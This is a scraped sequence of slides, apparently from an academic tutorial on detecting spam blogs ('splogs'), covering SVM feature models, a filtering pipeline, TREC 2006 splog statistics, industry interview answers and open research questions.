![Page 75: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/75.jpg)
Scraped content typically lacks the personal nature of blog posts
![Page 76: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/76.jpg)
• SVM based model– Binary Features– Linear Kernel
• Hand verified training set of blogs and splogs– 700 blogs and 700 splogs
• F measure ~ 88%
wewhatwasmyorgflickrpaperwords
findinfonewsyouranotherwebsitebestarticles
weblogmotionmethankgojanuarytrackbackarchives
perfectproductsuncategorizedhotresourcesincthreecopyright
![Page 77: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/77.jpg)
2-commentsto-theit-wasalso-added1-comment3-comments
comments-offin-uncategorizedcategories-uncategorizednew-york
• Features created using two adjacent words
• Less susceptible to adversarial attacks
• SVM based model– Binary Features– Linear Kernel
• F measure ~ 86%
![Page 78: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/78.jpg)
• Features constructed by tokenizing outgoing URLs
• Similar to (earlier) URL only models but captures more context– URL tokens in the badge
crazy blogosphere
– Default Wordpress Links
• F-measure ~ 82%
technoratiflickrfeedburnerblogrolling…
dougalborenzed1photomatt
![Page 79: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/79.jpg)
• We have been experimenting with multiple approaches
• Dataset available at:
– http://ebiquity.umbc.edu/resource/html/id/212
![Page 80: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/80.jpg)
Post 1 from a Spam Blog onForex.. Trading
![Page 81: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/81.jpg)
Post 2 from the same Spam Blogon Forex.. Trading
![Page 82: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/82.jpg)
• Intuition: Splogs feature highly correlated content across multiple posts (text, out-links etc..)
• Lin et al have proposed and analyzed useful metrics to identify such correlations
• Two fetches per URL – can exploit structured feed entries
• Precision ~ 86%, Recall ~ 47%
![Page 83: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/83.jpg)
• Outgoing Anchors
• Character N-grams and Word N-grams
• Named Entity Ratio
• Text Compression Ratio
• Pronoun Entity Ratio
![Page 84: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/84.jpg)
![Page 85: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/85.jpg)
![Page 86: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/86.jpg)
![Page 87: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/87.jpg)
![Page 88: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/88.jpg)
http://www.engadget.com 1942http://www.huffingtonpost.com/theblog 905http://www.crooksandliars.com 637http://blogs.guardian.co.uk/news 616http://www.littlegreenfootballs.com/weblog 611
http://spaces.msn.com/members/pony-girl 505http://spaces.msn.com/members/black-puss 505http://spaces.msn.com/members/amputee-women 505http://spaces.msn.com/members/free-stories 505http://spaces.msn.com/members/first-time-girl 505
Top 5
Top 5
![Page 89: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/89.jpg)
http://www.xanga.com/home.aspx?user=hit_me_layoutz273http://www.xanga.com/home.aspx?user=i_jock_layouts 271http://www.xanga.com/home.aspx?user=slp_layouts_slp 198http://spaces.msn.com/members/cyrustse1986 193http://www.xanga.com/home.aspx?user=layouts_n_codes2005 180
http://worldseriesofpokerchipscardguard.blogspot.com 898http://rule-wsop.blogspot.com 898http://worldseries-ofpoler.blogspot.com 898http://qsopcom-1.blogspot.com 898http://weopcom.blogspot.com 898
Top 5
Top 5
![Page 90: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/90.jpg)
• Test set of 700 authentic blogs and 700 splogs• In-links from Technorati • Out-links from blog-home page• Labeled in-links/out-links to be a blog, splog, news
site, other website• 3 feature-types trained using SVMs
– In-link distribution– Out-link distribution– Co-citation distribution
• F-measure ~ 80%
![Page 91: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/91.jpg)
![Page 92: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/92.jpg)
BLACKLISTSWHITELISTSBLACKLISTSWHITELISTS
TEMPORALMODEL
TEMPORALMODEL
TEXTMODELTEXT
MODELREGEXREGEX URL MODELURL
MODEL
Ping Stream
Check with known blogs and splogs
Check knownregex patterns
Use models over text of URL
Use models over Blog home-page
Use models over post correlation
Increasing cost
![Page 93: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/93.jpg)
![Page 94: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/94.jpg)
“So, whats that mean for the current users? It means that we have a few things to iron out. We are working on them sa fast as possible. It will insure that we dont have these issues going forward in the future and have a solid solution. “
SPLOG REPORTER STATUS = RED “Due to lack of resources, mainly time, we have decided to pursue
other other web 2.0 interests. We had a good run and appreciate everyone who supported the splog fighting movement. We have
decided to keep the site up so as not to "break the web" and all the links to the site. If anyone is interested in acquiring Splog Reporter
please contact us.”
FIGHTING SPLOG
![Page 95: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/95.jpg)
Eliminating Splogs depends directly on blacklisting by search engines, contextual advertisement and affiliates. Sploggers have no more incentive to host such blogs and typically bring it down.
... a rather slow elimination process.
![Page 96: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/96.jpg)
![Page 97: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/97.jpg)
Nature of Splogs in TREC 2006
• Around 83K identifiable blogs in the collection, with 3.2M permalinks
• We identified 13,542 splogs
• Blacklisted 543K permalinks from these splogs
• This accounts to 16% of the entire collection
• Results tally in % to TREC dataset (Macdonald et al 2006)
![Page 98: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/98.jpg)
Impact of Splogs in TREC Queries
0
20
40
60
80
100
120
5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
![Page 99: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/99.jpg)
Higher in Spam Prone Contexts
0
20
40
60
80
100
120
5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
![Page 100: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/100.jpg)
![Page 101: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/101.jpg)
• When did you start seeing spam? in 2005 – on blog search engine results.
• How much spam? (in percents) roughly 25% of top retrieval results
• Is it increasing/decreasing? increasing• How are you tackling it? and How much effort goes into it?
definitely my team considers this an important research effort. In terms of person-hrs, at least 2080 in 2006
• Do you have any new architectures/frameworks/initiatives? Yes – work publicly available
• What would you want researchers to address? temporal and structural properties
• What are future trends? collaborative splog detection
![Page 102: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/102.jpg)
• When did you start seeing spam? Late 2005. Late summer of 2002 couple of years hand edited black lists, URL pattern filtering
• How much spam? (in percents) big non-blog category, around 70% from weblogs.com,
• Is it increasing/decreasing? No significant change• How are you tackling it? and How much effort goes into it? Around 4160
person-hrs• Any message(blurbs) to the ICWSM audience? "At Sphere, we're
analyzing the mechanisms used by splogs and finding detectable signatures that can be applied to very large datasets. It's ourcontention that available tools and protocols must necessarily limit the strategies available to successful sploggers. While that set of strategies continues to grow, we're continually innovating to find new and effective ways of detecting those strategies, suppressing spam, and keeping the blogosphere a rich, easily navigable universe of information"
![Page 103: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/103.jpg)
• When did you start seeing spam? In early 2005, we started to see the #spam blogs and pings from non-weblogs sources ramp out rapidly.
• How much spam? (in percents)There's a big range, depends on the day. There can be huge spam attacks on some days. For today, for example: 15% spam and 30% non-blog (but today's 15% spam number is on the low side) . This doesn't include other kinds of bad pings: duplicates, out-dated, urls that are forbidden or have no data
• Is it increasing/decreasing? It's increasing in absolute counts, just like the total number of weblogs ever created is increasing. However, in terms of the number of active spam weblogs, it's fairly constant, just like the number of active English-language weblogs is fairly flat now.
• Do you have any new architectures/frameworks/initiatives? Our architecture is in place and working well.
![Page 104: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/104.jpg)
• What would you want researchers to address? - There is a minority of sophisticated spammers that create sleeper spam blogs that look just like regular blogs and then months later start linking to affiliate sites. How to catch these early? - How to detect repurposed blog content (downright plagiarism either for use in spam blog or simply for the age-old reason of building one's own reputation on false premises). - Spam in foreign languages: structural similarities/differences/extent of the problem?
• What are future trends? - PayForPost type services: in-post advertisements that indistinguishable from blogger content and may or may not be disclosed => need for spam detection at the post level instead of simply at the blog level; need to filter out/discount posts whether than entire blogs.
![Page 105: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/105.jpg)
![Page 106: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/106.jpg)
![Page 107: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/107.jpg)
• All forms of spam detection fit into a general class of classification problem– Classification is considered a “game” between
classifier and adversary
– Adversaries adapt to evade filters
• Its clear that a classifier has to learn to classify new forms of spam– Update training sets
– Identify new detection techniques
![Page 108: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/108.jpg)
“New Niche”Update Training Sets, Use Language IndependentTechniques
![Page 109: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/109.jpg)
• A form of spam blog that seems to be quite common on blogger– Create 1 post– Use blog as doorway
• Filters find it difficult to detect spam without avoiding false positives
• Sandboxing technique used by blog search engines
• Technique will go out of fashion once web search engines use similar strategies
![Page 110: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/110.jpg)
Blogspot “1” technique
![Page 111: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/111.jpg)
• Are splogs appearing in Non-English?– Not yet?
– Seen many cases of spam blogs in Japanese
• Creating training examples for multiple languages not feasible
• Identifying language independent techniques that capture stereotypes in splog create tools will be important
![Page 112: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/112.jpg)
• Evaluation of effectiveness of filters– Generic Precision and Recall– Precision and Recall with a when?
• Continued QoS guarantees in an adversarial setting– Methodology– Semi-automatic techniques
• Methodology for overall maintenance of the filter
![Page 113: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/113.jpg)
BLACKLISTSWHITELISTSBLACKLISTSWHITELISTS
RSSMODEL
RSSMODEL
TEXTMODELTEXT
MODELREGEXREGEX URL MODELURL
MODEL
Ping Stream
Check with known blogs and splogs
Check knownregex patterns
Use models over text of URL
Use models over Blog home-page
Use models over post correlation
LEARNER
Continuing Work
![Page 114: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/114.jpg)
![Page 115: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/115.jpg)
![Page 116: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/116.jpg)
• Trends suggest that the problem of splogs will continue
• Research needs to continue identifying new detection techniques
• The community has to incorporate collaborative techniques for detection
• Research needs to understand filter evolution in a more principled way
![Page 117: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/117.jpg)
• http://icwsm-blog-spam.blogspot.com/– For (too) late breaking resources for this tutorial
• http://planet.socialMediaResearch.org/– A feed aggregator for blogs relevant to social media– Suggest new blogs to [email protected]
• http://sus.picious.info/– Prototype spam reporting service
• http://ebiquity.umbc.edu/memeta/resources/– Blog and splog datasets, bibliography, etc.
![Page 118: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/118.jpg)